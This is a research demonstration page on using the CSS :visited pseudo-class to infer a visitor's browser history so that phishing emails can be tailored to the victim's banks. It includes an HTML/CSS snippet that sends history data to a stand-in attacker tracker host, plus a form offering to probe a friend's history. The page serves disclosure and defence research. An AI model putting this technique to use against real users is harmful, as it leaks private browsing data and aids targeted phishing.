Phishing for Clues

Inferring Context Using Cascading Style Sheets and Browser History

Markus Jakobsson, Tom N. Jagatic, and Sid Stamm

Stop-Phishing.com

An illustrative example

Demonstration: View all "sites of interest" within your own browser history.

Send a browser-recon.info
link to a friend
Your Name:
Your Email:
Friend's Name:
Friend's Email:
Would you like to know if your friend has visited any "sites of interest?" yes no
Note: Only your name will be shared with the recipient of the message. Notification messages of friend browser history will only indicate if this technique was successful.

The strongest indication consumers get that a particular phishing email is not legit is that it is "sent by" an institution they do not have any relation with. For example, a person who banks with CitiBank and AmeriTrade is not going to believe an email appearing to be sent by Chase or etrade, asking him or her to confirm his password. To improve the yield, phishers are likely to try to automatically extract as much information they can about their victims, then target them in manners that are consistent with the context. More concretely, if a phisher could determine banking relationships, he would not have to spoof the "wrong" entities when targeting victims. Alarmingly, this is rather straightforward to do, and hard to protect against.

One can use a simple technique used to examine the web browser history of an unsuspecting web site visitor using Cascading Style Sheets. This technique is particularly worrisome in the problem domain of phishing. Phishers typically send massive amounts of bulk email hoping their lure will be successful. Given greater context, such lures can be more effectively tailored---perhaps even in a context aware phishing attack. It should be emphasized the following attack can be launched from any arbitrary web site and is embedded in HTML markup. Many web browsers are susceptible.

Cascading Style Sheets (CSS) is a stylesheet language used to describe the presentation of a document written in a markup language, such as HTML. The CSS :visited pseudo-class can be used in the following manner to notify a phisher, Eve, if Alice has visited the web page http://some.bank.com/login. The #foo attribute in this example sets a background property to reference Eve's tracking application http://evil.eve.ws/tracker if the URL http://some.bank.com/login appears in the history of Alice's web browser.

    <head>
    [...]
    <style type="text/css">
      #foo:visited{
         background: url(http://evil.eve.ws/tracker?who=alice&what=somebank);
      }
    </style>
    </head>    

    <a id="foo" href="http://some.bank.com/login"></a>
  

A similar technique can be performed by anticipating the time required to perform certain web browser operations, namely, cache hits and misses of targeted content. Felten and Schneider describe this approach in Timing Attacks on Web Privacy.

To learn more about possible countermeasures, please read our paper (pdf) or send us an email.